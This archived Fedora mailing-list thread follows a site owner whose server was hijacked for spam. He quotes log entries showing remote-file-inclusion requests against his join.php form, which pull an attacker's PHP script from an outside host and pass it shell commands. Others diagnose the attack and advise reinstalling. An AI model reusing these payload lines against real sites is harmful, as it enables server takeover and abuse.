Re: Postfix hit again (Spam)

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On Tue, 23 May 2006 16:39:20 +0100 Paul Howarth <paul@xxxxxxxxxxxx> wrote:

> On Tue, 2006-05-23 at 11:25 -0400, CodeHeads wrote:
> > -----BEGIN PGP SIGNED MESSAGE-----
> > Hash: SHA1
> > 
> > On Tue, 23 May 2006 08:45:30 +0100 Paul Howarth <paul@xxxxxxxxxxxx> wrote:
> > 
> > > On Mon, 2006-05-22 at 23:11 -0400, CodeHeads wrote:
> > > > -----BEGIN PGP SIGNED MESSAGE-----
> > > > Hash: SHA1
> > > > 
> > > > On Tue, 23 May 2006 00:14:32 +0000
> > > > replies-lists-redhat@xxxxxxxxxxxxxxxxxxxxx wrote:
> > > > > i haven't been following this topic in great detail, but i suspect
> > > > > that you have a form on your site that is being exploited for "form
> > > > > spam". if you're not familiar with this, search google for "form
> > > > > spam".
> > > > > 
> > > > >    - Rick
> > > > 
> > > > 
> > > > Rick,
> > > > Thank you, No, I have not heard of this.
> > > 
> > > I don't think that's what this is. Form spam takes advantage of
> > > poorly-coded mail/contact forms and uses them to send mail to recipients
> > > other than those intended by the form designer.
> > > 
> > > What's happening here is that the spammer is running their own code
> > > (downloaded into /tmp) to send the mail, a rather more serious
> > > situation.
> > > 
> > > Paul.
> > > 
> > I might not know too much but I really think they are using my forms.  I
> > found quite a few log entries. Here are a few.
> > 81.199.173.8 - - [22/May/2006:18:57:51 -0400]
> > "POST /topsites/sources/join.php?FORM%5burl%5d=owned&CONFIG%5bcaptcha%5d=1&CONFIG%5bpath%5d=http://www.tiffefermaintfashion.com/gbook/tmp/xzblog.txt?
> > HTTP/1.0" 200 5923
> > 
> > AOL:
> > 172.179.33.217 - - [21/May/2006:07:58:01 -0400]
> > "GET /topsites/sources/join.php?FORM%5burl%5d=owned&CONFIG%5bcaptcha%5d=1&CONFIG%5bpath%5d=http://xpl.netmisphere2.com/CMD.gif?&cmd=id
> > HTTP/1.1" 200 2374
> > 172.179.33.217 - - [21/May/2006:07:58:20 -0400]
> > "GET /topsites/sources/join.php?FORM%5burl%5d=owned&CONFIG%5bcaptcha%5d=1&CONFIG%5bpath%5d=http://xpl.netmisphere2.com/CMD.gif?&cmd=w
> > HTTP/1.1" 200 2412
> > 172.179.33.217 - - [21/May/2006:07:58:34 -0400]
> > "GET /topsites/sources/join.php?FORM%5burl%5d=owned&CONFIG%5bcaptcha%5d=1&CONFIG%5bpath%5d=http://xpl.netmisphere2.com/CMD.gif?&cmd=cd%20/var/tmp
> > HTTP/1.1" 200 2323
> > 
> > And the xpl.netmisphere2.com site has hacking information:
> > http://xpl.netmisphere2.com/  I think this outta be illegal!!
> 
> Looks like an exploit of a cross-site scripting vulnerability in your
> join.php form. http://xpl.netmisphere2.com/CMD.gif is the cracker's PHP
> script that gets injected into your form, it's not an image at all.
> 
> You need to turn off that form until you can get a fixed version of that
> application. And of course reinstall that system.
> 
> Paul.
> 

Thanks Paul, That is what I thought.  I am writing my own topsites anyway, so
that is no big deal.  I will be deleting the other one.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.3 (GNU/Linux)

iD8DBQFEczXHfw3TK8jhZrsRAnILAKCH0SHKRpaagUi3Fe4oJSiUWDvC5wCaAuCQ
5sR75hAfYXAmF2Cjh5suKfo=
=4buC
-----END PGP SIGNATURE-----

-- 
fedora-list mailing list
fedora-list@xxxxxxxxxx
To unsubscribe: https://www.redhat.com/mailman/listinfo/fedora-list
[Index of Archives]     [Older Fedora Users]     [Fedora Announce]     [Fedora Package Announce]     [EPEL Announce]     [Fedora Magazine]     [Fedora News]     [Fedora Summer Coding]     [Fedora Laptop]     [Fedora Cloud]     [Fedora Advisory Board]     [Fedora Education]     [Fedora Security]     [Fedora Scitech]     [Fedora Robotics]     [Fedora Maintainers]     [Fedora Infrastructure]     [Fedora Websites]     [Anaconda Devel]     [Fedora Devel Java]     [Fedora Legacy]     [Fedora Desktop]     [Fedora Fonts]     [ATA RAID]     [Fedora Marketing]     [Fedora Management Tools]     [Fedora Mentors]     [SSH]     [Fedora Package Review]     [Fedora R Devel]     [Fedora PHP Devel]     [Kickstart]     [Fedora Music]     [Fedora Packaging]     [Centos]     [Fedora SELinux]     [Fedora Legal]     [Fedora Kernel]     [Fedora OCaml]     [Coolkey]     [Virtualization Tools]     [ET Management Tools]     [Yum Users]     [Tux]     [Yosemite News]     [Gnome Users]     [KDE Users]     [Fedora Art]     [Fedora Docs]     [Asterisk PBX]     [Fedora Sparc]     [Fedora Universal Network Connector]     [Libvirt Users]     [Fedora ARM]

  Powered by Linux